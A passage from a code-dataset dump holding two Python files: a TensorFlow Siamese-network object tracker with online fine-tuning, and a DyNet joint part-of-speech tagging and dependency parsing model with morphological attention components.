numpy as np\nimport time\nfrom src.visualization import show_frame\nimport src.global_instance as glo_ins\nimport src.finetune as finetune\nimport src.ConvNetValue_Class as cnvc\n\nimport src.new_SampsPool_Class as new_sp\nimport src.samples_from_one_image as sfoi\nimport src.get_samps_and_labels_batch as gsalb\n\nimport tracemalloc\n\n# gpu_device = 2\n# os.environ['CUDA_VISIBLE_DEVICES'] = '{}'.format(gpu_device)\n\n# read default parameters and override with custom ones\ndef tracker(hp, run, design, env, samples_d, finetune_d, frame_name_list, pos_x, pos_y, target_w, target_h, final_score_sz, filename, image,\n templates_z, scores, start_frame, samples_pool_t, pos_x_ph, pos_y_ph, z_sz_ph, x_sz0_ph, x_sz1_ph, x_sz2_ph):\n\n # TODO: <> tracemalloc\n tracemalloc.start()\n num_frames = np.size(frame_name_list)\n\n # TODO: <> if num_frame is 
> threshold we should separate the tf.Session and reset the default graph\n    # stores tracker's output for evaluation\n    bboxes = np.zeros((num_frames, 4))\n\n    scale_factors = hp.scale_step ** np.linspace(-np.ceil(hp.scale_num / 2), np.ceil(hp.scale_num / 2), hp.scale_num)\n    # cosine window to penalize large displacements\n    hann_1d = np.expand_dims(np.hanning(final_score_sz), axis=0)\n    penalty = np.transpose(hann_1d) * hann_1d\n    penalty = penalty / np.sum(penalty)\n\n    context = design.context * (target_w + target_h)\n    z_sz = np.sqrt(np.prod((target_w + context) * (target_h + context)))\n    x_sz = float(design.search_sz) / design.exemplar_sz * z_sz\n\n    # thresholds to saturate patches shrinking/growing\n    min_z = hp.scale_min * z_sz\n    max_z = hp.scale_max * z_sz\n    min_x = hp.scale_min * x_sz\n    max_x = hp.scale_max * x_sz\n\n    # run_metadata = tf.RunMetadata()\n    # run_opts = {\n    #     'options': tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE),\n    #     'run_metadata': run_metadata,\n    # }\n\n    run_opts = {}\n\n    # with tf.Session(config=tf.ConfigProto(log_device_placement=True)) as sess:\n    with tf.Session() as sess:\n        tf.global_variables_initializer().run()\n        # Coordinate the loading of image files.\n        coord = tf.train.Coordinator()\n        threads = tf.train.start_queue_runners(coord=coord)\n\n        # save first frame position (from ground-truth)\n        bboxes[0, :] = pos_x - target_w / 2, pos_y - target_h / 2, target_w, target_h\n\n        image_, templates_z_ = sess.run([image, templates_z], feed_dict={\n            pos_x_ph: pos_x,\n            pos_y_ph: pos_y,\n            z_sz_ph: z_sz,\n\n            filename: frame_name_list[0]})\n        new_templates_z_ = templates_z_\n\n        bbox_first_tl = bboxes[0]\n\n        # TODO: <> samps pool\n        if samples_pool_t is None:\n            samples_pool_t = new_sp.NewSampsPool(samples_d)\n            image_2, pos_samples_info, neg_samples_info = sfoi.get_samples_from_image(image_, bbox_first_tl,\n                                                                                      samples_d.POS_PER_FRAME,\n                                                                                      samples_d.NEG_PER_FRAME)\n            samples_pool_t.add_samples(image_2, pos_samples_info, neg_samples_info)\n\n        t_start = time.time()\n\n        # TODO: <> time monitor\n        #glo_ins.set_val(\"start_time_monitor\", time.time())\n\n        # Get an image from the queue\n        for i in range(1, num_frames):\n\n            scaled_exemplar = z_sz * scale_factors\n            scaled_search_area = x_sz * scale_factors\n            scaled_target_w = target_w * scale_factors\n            scaled_target_h = target_h * scale_factors\n            image_, scores_ = sess.run(\n                [image, scores],\n                feed_dict={\n                    pos_x_ph: pos_x,\n                    pos_y_ph: pos_y,\n                    x_sz0_ph: scaled_search_area[0],\n                    x_sz1_ph: scaled_search_area[1],\n                    x_sz2_ph: scaled_search_area[2],\n                    templates_z: np.squeeze(templates_z_),\n                    filename: frame_name_list[i],\n                }, **run_opts)\n\n            scores_ = np.squeeze(scores_)\n            # penalize change of scale\n            scores_[0, :, :] = hp.scale_penalty * scores_[0, :, :]\n            scores_[2, :, :] = hp.scale_penalty * scores_[2, :, :]\n            # find scale with highest peak (after penalty)\n            new_scale_id = np.argmax(np.amax(scores_, axis=(1, 2)))\n\n            # update scaled sizes\n            x_sz = (1 - hp.scale_lr) * x_sz + hp.scale_lr * scaled_search_area[new_scale_id]\n            target_w = (1 - hp.scale_lr) * target_w + hp.scale_lr * scaled_target_w[new_scale_id]\n            target_h = (1 - hp.scale_lr) * target_h + hp.scale_lr * scaled_target_h[new_scale_id]\n            # select response with new_scale_id\n            score_ = scores_[new_scale_id, :, :]\n            score_ = score_ - np.min(score_)\n            score_ = score_ / np.sum(score_)\n            # apply displacement penalty\n            score_ = (1 - hp.window_influence) * score_ + hp.window_influence * penalty\n            pos_x, pos_y = _update_target_position(pos_x, pos_y, score_, final_score_sz, design.tot_stride,\n                                                   
design.search_sz, hp.response_up, x_sz)\n\n # convert to and save output\n # TODO: <> bboxes here have top-left position\n bboxes[i, :] = pos_x - target_w / 2, pos_y - target_h / 2, target_w, target_h\n\n\n # TODO <> params\n frame_index = i\n SAMPS_EPOCH = design.SAMPLES_EPOCH\n FINETUNE_EPOCH = design.FINETUNE_EPOCH\n # params\n if not frame_index % SAMPS_EPOCH:\n image_2, pos_samples_info, neg_samples_info = sfoi.get_samples_from_image(image_, bboxes[frame_index],\n samples_d.POS_PER_FRAME,\n samples_d.NEG_PER_FRAME)\n samples_pool_t.add_samples(image_2, pos_samples_info, neg_samples_info)\n\n if not frame_index % FINETUNE_EPOCH:\n batch_samps, batch_labels = gsalb.get_samps_and_lables_batch(samples_pool_t, (samples_d.batch_pos_size, samples_d.batch_neg_size))\n\n # TODO: <> carry out fine-tune process\n finetune.complete_fintune(batch_samps, batch_labels, env, design)\n # TODO <> debug? should you update matconvnet here?\n '''\n glo_ins.set_val(\"instance\", cnvc.ConvNetValue().update_value())\n filename, image, templates_z, scores, pos_x_ph, pos_y_ph, \\\n z_sz_ph, x_sz0_ph, x_sz1_ph, x_sz2_ph = siam.build_tracking_graph(final_score_sz, design)\n '''\n # update the target representation with a rolling average\n if hp.z_lr > 0:\n new_templates_z_ = sess.run([templates_z], feed_dict={\n pos_x_ph: pos_x,\n pos_y_ph: pos_y,\n z_sz_ph: z_sz,\n #frame_index_ph: frame_index,\n image: image_\n })\n\n templates_z_ = (1 - hp.z_lr) * np.asarray(templates_z_) + hp.z_lr * np.asarray(new_templates_z_)\n\n # update template patch size\n z_sz = (1 - hp.scale_lr) * z_sz + hp.scale_lr * scaled_exemplar[new_scale_id]\n\n if run.visualization:\n show_frame(image_, bboxes[i, :], 1)\n # debug:\n #sess.graph.finalize()\n\n t_elapsed = time.time() - t_start\n speed = num_frames / t_elapsed\n\n # Finish off the filename queue coordinator.\n coord.request_stop()\n coord.join(threads)\n\n\n # from tensorflow.python.client import timeline\n # trace = timeline.Timeline(step_stats=run_metadata.step_stats)\n # trace_file = open('timeline-search.ctf.json', 'w')\n # trace_file.write(trace.generate_chrome_trace_format())\n snapshot = tracemalloc.take_snapshot()\n top_stats = snapshot.statistics(\"lineno\")\n del samples_pool_t\n for line in top_stats[:10]:\n print(\"===================================================\",line)\n\n plt.close('all')\n #print(\"num_frames\",num_frames)\n #return bboxes, speed, samples_pool_t\n return bboxes, speed\n\n\ndef _update_target_position(pos_x, pos_y, score, final_score_sz, tot_stride, search_sz, response_up, x_sz):\n # find location of score maximizer\n p = np.asarray(np.unravel_index(np.argmax(score), np.shape(score)))\n # displacement from the center in search area final representation ...\n center = float(final_score_sz - 1) / 2\n disp_in_area = p - center\n # displacement from the center in instance crop\n disp_in_xcrop = disp_in_area * float(tot_stride) / response_up\n # displacement from the center in instance crop (in frame coordinates)\n disp_in_frame = disp_in_xcrop * x_sz / search_sz\n # *position* within frame in frame coordinates\n pos_y, pos_x = pos_y + disp_in_frame[0], pos_x + disp_in_frame[1]\n return pos_x, pos_y\n\ndef time_monitor():\n TIME_THRESHOLD = 5\n # TODO: <> to check time in global dict. 
if time_gap > threshold, reset the graph\n now_time_monitor = time.time()\n gap_time_monitor = now_time_monitor - glo_ins.get_val(\"start_time_monitor\")\n if gap_time_monitor >= TIME_THRESHOLD:\n # reset tf.Graph()\n glo_ins.set_val(\"start_time_monitor\", now_time_monitor)\n return True\n return False\n\n\n\n","sub_path":"src/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":9677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"430092603","text":"# coding=utf-8\nfrom dynet import *\nimport dynet\nfrom utils import read_conll, write_conll, load_embeddings_file\nfrom operator import itemgetter\nimport utils, time, random, decoder\nimport numpy as np\nfrom mnnl import FFSequencePredictor, Layer, RNNSequencePredictor, BiRNNSequencePredictor\n\n\nclass jPosDepLearner:\n def __init__(self, vocab, pos, rels, w2i, c2i, m2i, t2i, morph_dict, options):\n self.model = ParameterCollection()\n random.seed(1)\n self.trainer = AdamTrainer(self.model)\n #if options.learning_rate is not None:\n # self.trainer = AdamTrainer(self.model, alpha=options.learning_rate)\n # print(\"Adam initial learning rate:\", options.learning_rate)\n self.activations = {'tanh': tanh, 'sigmoid': logistic, 'relu': rectify,\n 'tanh3': (lambda x: tanh(cwise_multiply(cwise_multiply(x, x), x)))}\n self.activation = self.activations[options.activation]\n\n self.blstmFlag = options.blstmFlag\n self.labelsFlag = options.labelsFlag\n self.costaugFlag = options.costaugFlag\n self.bibiFlag = options.bibiFlag\n self.morphFlag = options.morphFlag\n self.goldMorphFlag = options.goldMorphFlag\n self.morphTagFlag = options.morphTagFlag\n self.goldMorphTagFlag = options.goldMorphTagFlag\n self.lowerCase = options.lowerCase\n self.mtag_encoding_composition_type = options.mtag_encoding_composition_type\n self.morph_encoding_composition_type = options.morph_encoding_composition_type\n self.pos_encoding_composition_type = options.pos_encoding_composition_type\n\n self.pos_wsum_composition_alpha = options.pos_wsum_composition_alpha\n self.mtag_wsum_composition_alpha = options.mtag_wsum_composition_alpha\n self.morph_wsum_composition_alpha = options.morph_wsum_composition_alpha\n\n self.ldims = options.lstm_dims\n self.wdims = options.wembedding_dims\n self.mdims = options.membedding_dims\n self.tdims = options.tembedding_dims\n self.cdims = options.cembedding_dims\n self.layers = options.lstm_layers\n self.wordsCount = vocab\n self.vocab = {word: ind + 3 for word, ind in iter(w2i.items())}\n self.pos = {word: ind for ind, word in enumerate(pos)}\n self.id2pos = {ind: word for ind, word in enumerate(pos)}\n self.c2i = c2i\n self.m2i = m2i\n self.t2i = t2i\n self.i2t = {t2i[i]:i for i in self.t2i}\n self.morph_dict = morph_dict\n self.rels = {word: ind for ind, word in enumerate(rels)}\n self.irels = rels\n self.pdims = options.pembedding_dims\n self.tagging_attention_size = options.tagging_att_size\n\n self.vocab['*PAD*'] = 1\n self.vocab['*INITIAL*'] = 2\n self.wlookup = self.model.add_lookup_parameters((len(vocab) + 3, self.wdims))\n self.clookup = self.model.add_lookup_parameters((len(c2i), self.cdims))\n self.plookup = self.model.add_lookup_parameters((len(pos), self.pdims))\n self.ext_embeddings = None\n\n if options.external_embedding != \"NONE\":\n ext_embeddings, ext_emb_dim = {}, 100\n #load_embeddings_file(options.external_embedding, lower=self.lowerCase, type=options.external_embedding_type)\n assert (ext_emb_dim == self.wdims)\n print(\"Initializing word 
embeddings by pre-trained vectors\")\n count = 0\n for word in self.vocab:\n if word in ext_embeddings:\n count += 1\n self.wlookup.init_row(self.vocab[word], ext_embeddings[word])\n self.ext_embeddings = ext_embeddings\n print(\"Vocab size: %d; #words having pretrained vectors: %d\" % (len(self.vocab), count))\n\n self.morph_dims = 2*2*self.mdims if self.morphFlag else 0\n self.mtag_dims = 2*self.tdims if self.morphTagFlag else 0\n self.pos_builders = [VanillaLSTMBuilder(1, self.wdims + self.cdims * 2 + self.morph_dims + self.mtag_dims, self.ldims, self.model),\n VanillaLSTMBuilder(1, self.wdims + self.cdims * 2 + self.morph_dims + self.mtag_dims, self.ldims, self.model)]\n self.pos_bbuilders = [VanillaLSTMBuilder(1, self.ldims * 2, self.ldims, self.model),\n VanillaLSTMBuilder(1, self.ldims * 2, self.ldims, self.model)]\n\n if self.bibiFlag:\n self.builders = [VanillaLSTMBuilder(1, self.wdims + self.cdims * 2 + self.morph_dims + self.mtag_dims + self.pdims, self.ldims, self.model),\n VanillaLSTMBuilder(1, self.wdims + self.cdims * 2 + self.morph_dims + self.mtag_dims + self.pdims, self.ldims, self.model)]\n self.bbuilders = [VanillaLSTMBuilder(1, self.ldims * 2, self.ldims, self.model),\n VanillaLSTMBuilder(1, self.ldims * 2, self.ldims, self.model)]\n elif self.layers > 0:\n self.builders = [VanillaLSTMBuilder(self.layers, self.wdims + self.cdims * 2 + self.morph_dims + self.mtag_dims + self.pdims, self.ldims, self.model),\n VanillaLSTMBuilder(self.layers, self.wdims + self.cdims * 2 + self.morph_dims + self.mtag_dims + self.pdims, self.ldims, self.model)]\n else:\n self.builders = [SimpleRNNBuilder(1, self.wdims + self.cdims * 2 + self.morph_dims + self.mtag_dims, self.ldims, self.model),\n SimpleRNNBuilder(1, self.wdims + self.cdims * 2 + self.morph_dims + self.mtag_dims, self.ldims, self.model)]\n\n self.ffSeqPredictor = FFSequencePredictor(Layer(self.model, self.ldims * 2, len(self.pos), softmax))\n\n self.hidden_units = options.hidden_units\n\n self.hidBias = self.model.add_parameters((self.ldims * 8))\n self.hidLayer = self.model.add_parameters((self.hidden_units, self.ldims * 8))\n self.hid2Bias = self.model.add_parameters((self.hidden_units))\n\n self.outLayer = self.model.add_parameters((1, self.hidden_units if self.hidden_units > 0 else self.ldims * 8))\n\n if self.labelsFlag:\n self.rhidBias = self.model.add_parameters((self.ldims * 8))\n self.rhidLayer = self.model.add_parameters((self.hidden_units, self.ldims * 8))\n self.rhid2Bias = self.model.add_parameters((self.hidden_units))\n self.routLayer = self.model.add_parameters(\n (len(self.irels), self.hidden_units if self.hidden_units > 0 else self.ldims * 8))\n self.routBias = self.model.add_parameters((len(self.irels)))\n self.ffRelPredictor = FFSequencePredictor(\n Layer(self.model, self.hidden_units if self.hidden_units > 0 else self.ldims * 8, len(self.irels),\n softmax))\n\n self.char_rnn = RNNSequencePredictor(LSTMBuilder(1, self.cdims, self.cdims, self.model))\n\n if self.morphFlag:\n self.seg_lstm = [VanillaLSTMBuilder(1, self.cdims, self.cdims, self.model),\n VanillaLSTMBuilder(1, self.cdims, self.cdims, self.model)]\n self.seg_hidLayer = self.model.add_parameters((1, self.cdims*2))\n self.slookup = self.model.add_lookup_parameters((len(self.c2i), self.cdims))\n\n self.char_lstm = [VanillaLSTMBuilder(1, self.cdims, self.mdims, self.model),\n VanillaLSTMBuilder(1, self.cdims, self.mdims, self.model)]\n self.char_hidLayer = self.model.add_parameters((self.mdims, self.mdims*2))\n self.mclookup = 
self.model.add_lookup_parameters((len(self.c2i), self.cdims))\n\n self.morph_lstm = [VanillaLSTMBuilder(1, self.mdims*2, self.wdims, self.model),\n VanillaLSTMBuilder(1, self.mdims*2, self.wdims, self.model)]\n self.morph_hidLayer = self.model.add_parameters((self.wdims, self.wdims*2))\n self.mlookup = self.model.add_lookup_parameters((len(m2i), self.mdims))\n\n self.morph_rnn = RNNSequencePredictor(LSTMBuilder(1, self.mdims*2, self.mdims*2, self.model))\n\n if self.morphTagFlag:\n # All weights for morpheme taging will be here. (CURSOR)\n\n # Decoder\n self.dec_lstm = VanillaLSTMBuilder(1, 2 * self.cdims + self.tdims + self.cdims * 2, self.cdims, self.model)\n\n # Attention\n self.attention_w1 = self.model.add_parameters((self.tagging_attention_size, self.cdims * 2))\n self.attention_w2 = self.model.add_parameters((self.tagging_attention_size, self.cdims * 2))\n self.attention_v = self.model.add_parameters((1, self.tagging_attention_size))\n\n # Attention Context\n self.attention_w1_context = self.model.add_parameters((self.tagging_attention_size, self.cdims * 2))\n self.attention_w2_context = self.model.add_parameters((self.tagging_attention_size, self.cdims * 2))\n self.attention_v_context = self.model.add_parameters((1, self.tagging_attention_size))\n\n # MLP - Softmax\n self.decoder_w = self.model.add_parameters((len(t2i), self.cdims))\n self.decoder_b = self.model.add_parameters((len(t2i)))\n\n self.mtag_rnn = RNNSequencePredictor(VanillaLSTMBuilder(1, self.tdims, self.tdims, self.model))\n self.tlookup = self.model.add_lookup_parameters((len(t2i), self.tdims))\n\n if self.mtag_encoding_composition_type != \"None\":\n self.mtag_composition_w = self.model.add_parameters((self.tagging_attention_size, 2 * self.tdims))\n self.mtag_composition_b = self.model.add_parameters(self.tagging_attention_size)\n self.mtag_composition_context = self.model.add_parameters(self.tagging_attention_size)\n if self.morph_encoding_composition_type != \"None\":\n self.morph_composition_w = self.model.add_parameters((self.tagging_attention_size, self.mdims*4))\n self.morph_composition_b = self.model.add_parameters(self.tagging_attention_size)\n self.morph_composition_context = self.model.add_parameters(self.tagging_attention_size)\n if self.pos_encoding_composition_type != \"None\":\n self.pos_composition_w = self.model.add_parameters((self.tagging_attention_size, self.pdims))\n self.pos_composition_b = self.model.add_parameters(self.tagging_attention_size)\n self.pos_composition_context = self.model.add_parameters(self.tagging_attention_size)\n\n def initialize(self):\n if self.morphFlag and self.ext_embeddings:\n print(\"Initializing word embeddings by morph2vec\")\n count = 0\n for word in self.vocab:\n if word not in self.ext_embeddings and word in self.morph_dict:\n morph_seg = self.morph_dict[word]\n\n count += 1\n self.wlookup.init_row(self.vocab[word], self.__getWordVector(morph_seg).vec_value())\n print(\"Vocab size: %d; #missing words having generated vectors: %d\" % (len(self.vocab), count))\n renew_cg()\n\n def __getExpr(self, sentence, i, j):\n\n if sentence[i].headfov is None:\n sentence[i].headfov = concatenate([sentence[i].lstms[0], sentence[i].lstms[1]])\n if sentence[j].modfov is None:\n sentence[j].modfov = concatenate([sentence[j].lstms[0], sentence[j].lstms[1]])\n\n _inputVector = concatenate(\n [sentence[i].headfov, sentence[j].modfov, dynet.abs(sentence[i].headfov - sentence[j].modfov),\n dynet.cmult(sentence[i].headfov, sentence[j].modfov)])\n\n if self.hidden_units > 0:\n output = 
self.outLayer.expr() * self.activation(\n self.hid2Bias.expr() + self.hidLayer.expr() * self.activation(\n _inputVector + self.hidBias.expr()))\n else:\n output = self.outLayer.expr() * self.activation(_inputVector + self.hidBias.expr())\n\n return output\n\n def __evaluate(self, sentence):\n exprs = [[self.__getExpr(sentence, i, j) for j in range(len(sentence))] for i in range(len(sentence))]\n scores = np.array([[output.scalar_value() for output in exprsRow] for exprsRow in exprs])\n\n return scores, exprs\n\n def pick_neg_log(self, pred, gold):\n return -dynet.log(dynet.pick(pred, gold))\n\n def binary_crossentropy(self, pred, gold):\n return dynet.binary_log_loss(pred, gold)\n\n def cosine_proximity(self, pred, gold):\n def l2_normalize(x):\n square_sum = dynet.sqrt(dynet.bmax(dynet.sum_elems(dynet.square(x)), np.finfo(float).eps * dynet.ones((1))[0]))\n return dynet.cdiv(x, square_sum)\n\n y_true = l2_normalize(pred)\n y_pred = l2_normalize(gold)\n\n return -dynet.sum_elems(dynet.cmult(y_true, y_pred))\n\n def __getRelVector(self, sentence, i, j):\n if sentence[i].rheadfov is None:\n sentence[i].rheadfov = concatenate([sentence[i].lstms[0], sentence[i].lstms[1]])\n if sentence[j].rmodfov is None:\n sentence[j].rmodfov = concatenate([sentence[j].lstms[0], sentence[j].lstms[1]])\n _outputVector = concatenate(\n [sentence[i].rheadfov, sentence[j].rmodfov, abs(sentence[i].rheadfov - sentence[j].rmodfov),\n cmult(sentence[i].rheadfov, sentence[j].rmodfov)])\n\n if self.hidden_units > 0:\n return self.rhid2Bias.expr() + self.rhidLayer.expr() * self.activation(\n _outputVector + self.rhidBias.expr())\n else:\n return _outputVector\n\n def __getSegmentationVector(self, word):\n slstm_forward = self.seg_lstm[0].initial_state()\n slstm_backward = self.seg_lstm[1].initial_state()\n\n seg_lstm_forward = slstm_forward.transduce([self.slookup[self.c2i[char] if char in self.c2i else 0] for char in word])\n seg_lstm_backward = slstm_backward.transduce([self.slookup[self.c2i[char] if char in self.c2i else 0] for char in reversed(word)])\n\n seg_vec = []\n for seg, rev_seg in zip(seg_lstm_forward,reversed(seg_lstm_backward)):\n seg_vec.append(dynet.logistic(self.seg_hidLayer.expr() * concatenate([seg,rev_seg])))\n\n seg_vec = concatenate(seg_vec)\n\n return seg_vec\n\n def __getMorphVector(self, morph):\n clstm_forward = self.char_lstm[0].initial_state()\n clstm_backward = self.char_lstm[1].initial_state()\n\n char_lstm_forward = clstm_forward.transduce([self.mclookup[self.c2i[char] if char in self.c2i else 0] for char in morph] if len(morph) > 0 else [self.mclookup[0]])[-1]\n char_lstm_backward = clstm_backward.transduce([self.mclookup[self.c2i[char] if char in self.c2i else 0] for char in reversed(morph)] if len(morph) > 0 else [self.mclookup[0]])[-1]\n\n char_emb = self.char_hidLayer.expr() * concatenate([char_lstm_forward,char_lstm_backward])\n\n return concatenate([self.mlookup[self.m2i[morph] if morph in self.m2i else 0], char_emb])\n\n def __getWordVector(self, morph_seg):\n mlstm_forward = self.morph_lstm[0].initial_state()\n mlstm_backward = self.morph_lstm[1].initial_state()\n\n morph_lstm_forward = mlstm_forward.transduce([self.__getMorphVector(morph) for morph in morph_seg])[-1]\n morph_lstm_backward = mlstm_backward.transduce([self.__getMorphVector(morph) for morph in reversed(morph_seg)])[-1]\n\n morph_enc = concatenate([morph_lstm_forward, morph_lstm_backward])\n word_vec = self.morph_hidLayer.expr() * morph_enc\n\n return word_vec\n\n def attend(self, input_mat, state, w1dt):\n w2 = 
parameter(self.attention_w2)\n v = parameter(self.attention_v)\n\n # input_mat: (encoder_state x seqlen) => input vecs concatenated as cols\n # w1dt: (attdim x seqlen)\n # w2dt: (attdim,1)\n w2dt = w2 * concatenate(list(state.s()))\n # att_weights: (seqlen,) row vector\n # unnormalized: (seqlen,)\n unnormalized = transpose(v * tanh(colwise_add(w1dt, w2dt)))\n att_weights = softmax(unnormalized)\n # context: (encoder_state)\n context = input_mat * att_weights\n return context\n\n def attend_context(self, input_mat, state, w1dt_context):\n w2_context = parameter(self.attention_w2_context)\n v_context = parameter(self.attention_v_context)\n\n # input_mat: (encoder_state x seqlen) => input vecs concatenated as cols\n # w1dt: (attdim x seqlen)\n # w2dt: (attdim,1)\n w2dt_context = w2_context * concatenate(list(state.s()))\n # att_weights: (seqlen,) row vector\n # unnormalized: (seqlen,)\n unnormalized = transpose(v_context * tanh(colwise_add(w1dt_context, w2dt_context)))\n att_weights = softmax(unnormalized)\n # context: (encoder_state)\n context = input_mat * att_weights\n return context\n\n def decode(self, vectors, decoder_seq, word_context):\n w = parameter(self.decoder_w)\n b = parameter(self.decoder_b)\n w1 = parameter(self.attention_w1)\n\n w1_context = parameter(self.attention_w1_context)\n input_mat = concatenate_cols(vectors)\n input_context = concatenate_cols(word_context)\n\n w1dt = None\n w1dt_context = None\n\n last_output_embeddings = self.tlookup[self.t2i[\"\"]]\n s = self.dec_lstm.initial_state().add_input(concatenate([vecInput(self.cdims * 2),\n last_output_embeddings,\n vecInput(self.cdims * 2)]))\n loss = []\n\n for char in decoder_seq:\n # w1dt can be computed and cached once for the entire decoding phase\n w1dt = w1dt or w1 * input_mat\n w1dt_context = w1dt_context or w1_context * input_context\n vector = concatenate([self.attend(input_mat, s, w1dt),\n last_output_embeddings,\n self.attend_context(input_context, s, w1dt_context)])\n s = s.add_input(vector)\n out_vector = w * s.output() + b\n probs = softmax(out_vector)\n last_output_embeddings = self.tlookup[char]\n loss.append(-log(pick(probs, char)))\n loss = esum(loss)\n return loss\n\n def __getLossMorphTagging(self, all_encoded_states, decoder_gold, word_context):\n return self.decode(all_encoded_states, decoder_gold, word_context)\n\n def generate(self, encoded, word_context):\n w = parameter(self.decoder_w)\n b = parameter(self.decoder_b)\n w1 = parameter(self.attention_w1)\n\n w1_context = parameter(self.attention_w1_context)\n\n input_mat = concatenate_cols(encoded)\n input_context = concatenate_cols(word_context)\n\n w1dt = None\n w1dt_context = None\n\n last_output_embeddings = self.tlookup[self.t2i[\"\"]]\n s = self.dec_lstm.initial_state().add_input(concatenate([vecInput(self.cdims * 2),\n last_output_embeddings,\n vecInput(self.cdims * 2)]))\n\n out = []\n count_EOS = 0\n limit_features = 10\n for i in range(limit_features):\n if count_EOS == 2: break\n # w1dt can be computed and cached once for the entire decoding phase\n w1dt = w1dt or w1 * input_mat\n w1dt_context = w1dt_context or w1_context * input_context\n vector = concatenate([self.attend(input_mat, s, w1dt),\n last_output_embeddings,\n self.attend_context(input_context, s, w1dt_context)])\n\n s = s.add_input(vector)\n out_vector = w * s.output() + b\n probs = softmax(out_vector).vec_value()\n next_char = probs.index(max(probs))\n last_output_embeddings = self.tlookup[next_char]\n if next_char == self.t2i[\"\"]:\n count_EOS += 1\n 
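The attend and attend_context helpers above implement standard additive (MLP) attention: score each encoder column with v^T tanh(W1*h + W2*s), softmax the scores, and return the weighted sum. A self-contained numpy sketch of the same scoring rule, with toy dimensions chosen only for illustration:

import numpy as np

def softmax(x):
    e = np.exp(x - x.max())
    return e / e.sum()

enc_dim, att_dim, seqlen = 4, 3, 5
H = np.random.randn(enc_dim, seqlen)      # input_mat: encoder states as columns
s = np.random.randn(enc_dim)              # decoder state
W1 = np.random.randn(att_dim, enc_dim)    # attention_w1
W2 = np.random.randn(att_dim, enc_dim)    # attention_w2
v = np.random.randn(1, att_dim)           # attention_v

w1dt = W1 @ H                             # cached once per decode, as in the code above
w2dt = (W2 @ s)[:, None]                  # column vector, broadcast over positions
weights = softmax((v @ np.tanh(w1dt + w2dt)).ravel())
context = H @ weights                     # attention-weighted encoder summary
print(weights.sum(), context.shape)       # 1.0 (4,)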
out.append(next_char)\n return out\n\n def Save(self, filename):\n self.model.save(filename)\n\n def Load(self, filename):\n self.model.populate(filename)\n\n def attend_encodings(self, encoded_sequence, encoding_type):\n if encoding_type == self.mtag_encoding_composition_type:\n w = self.mtag_composition_w \n b = self.mtag_composition_b\n c = self.mtag_composition_context\n elif encoding_type == self.morph_encoding_composition_type:\n w = self.morph_composition_w \n b = self.morph_composition_b\n c = self.morph_composition_context\n elif encoding_type == self.pos_encoding_composition_type:\n w = self.pos_composition_w \n b = self.pos_composition_b\n c = self.pos_composition_context\n\n att_mlp_outputs = []\n for e in encoded_sequence:\n mlp_out = (w * e) + b\n att_mlp_outputs.append(mlp_out)\n\n lst = []\n for o in att_mlp_outputs:\n lst.append(exp(sum_elems(cmult(o, c))))\n\n sum_all = esum(lst)\n\n probs = [cdiv(e, sum_all) for e in lst]\n att_context = esum(\n [cmult(p, h) for p, h in zip(probs, encoded_sequence)]\n )\n return att_context\n\n def Predict(self, conll_path):\n with open(conll_path, 'r') as conllFP:\n for iSentence, sentence in enumerate(read_conll(conllFP, self.c2i, self.m2i, self.t2i, self.morph_dict)):\n conll_sentence = [entry for entry in sentence if isinstance(entry, utils.ConllEntry)]\n\n if self.morphTagFlag:\n sentence_context = []\n last_state_char = self.char_rnn.predict_sequence([self.clookup[self.c2i[\"\"]]])[-1]\n rev_last_state_char = self.char_rnn.predict_sequence([self.clookup[self.c2i[\"\"]]])[-1]\n sentence_context.append(concatenate([last_state_char, rev_last_state_char]))\n for entry in conll_sentence:\n last_state_char = self.char_rnn.predict_sequence([self.clookup[c] for c in entry.idChars])\n rev_last_state_char = self.char_rnn.predict_sequence([self.clookup[c] for c in reversed(entry.idChars)])\n entry.char_rnn_states = [concatenate([f,b]) for f,b in zip(last_state_char, rev_last_state_char)]\n sentence_context.append(entry.char_rnn_states[-1])\n\n for idx, entry in enumerate(conll_sentence):\n #wordvec = self.wlookup[int(self.vocab.get(entry.norm, 0))] if self.wdims > 0 else None\n wordvec = inputTensor(entry.embedding)\n if self.morphTagFlag:\n entry.vec = concatenate([wordvec, entry.char_rnn_states[-1]])\n else:\n last_state_char = self.char_rnn.predict_sequence([self.clookup[c] for c in entry.idChars])[-1]\n rev_last_state_char = self.char_rnn.predict_sequence([self.clookup[c] for c in reversed(entry.idChars)])[-1]\n entry.vec = concatenate([wordvec, last_state_char, rev_last_state_char])\n \n morph_encodings = []\n for idx, entry in enumerate(conll_sentence):\n if self.morphFlag:\n if len(entry.norm) > 2:\n if self.goldMorphFlag:\n seg_vec = self.__getSegmentationVector(entry.norm)\n seg_vec = dynet.vecInput(seg_vec.dim()[0][0])\n seg_vec.set(entry.idMorphs)\n morph_seg = utils.generate_morphs(entry.norm, seg_vec.vec_value())\n entry.pred_seg = morph_seg\n else:\n seg_vec = self.__getSegmentationVector(entry.norm)\n morph_seg = utils.generate_morphs(entry.norm, seg_vec.vec_value())\n entry.pred_seg = seg_vec.vec_value()\n else:\n morph_seg = [entry.norm]\n entry.pred_seg = entry.idMorphs\n\n entry.seg = entry.idMorphs\n\n last_state_morph = self.morph_rnn.predict_sequence([self.__getMorphVector(morph) for morph in morph_seg])[-1]\n rev_last_state_morph = self.morph_rnn.predict_sequence([self.__getMorphVector(morph) for morph in reversed(morph_seg)])[\n -1]\n encoding_morph = concatenate([last_state_morph, rev_last_state_morph])\n 
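attend_encodings, defined above, scores each encoding against a learned context vector and returns their softmax-weighted sum over a small window (previous, current, next). A numpy sketch of that composition; the dimensions are illustrative assumptions:

import numpy as np

def attend_encodings_np(encs, W, b, c):
    # encs: list of vectors; W, b: the composition MLP; c: learned context vector
    mlp = [W @ e + b for e in encs]
    scores = np.array([np.exp(np.dot(o, c)) for o in mlp])
    probs = scores / scores.sum()
    return sum(p * e for p, e in zip(probs, encs))

dim, att = 6, 4
encs = [np.random.randn(dim) for _ in range(3)]   # prev / current / next encodings
W, b, c = np.random.randn(att, dim), np.random.randn(att), np.random.randn(att)
mixed = attend_encodings_np(encs, W, b, c)
print(mixed.shape)  # (6,)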
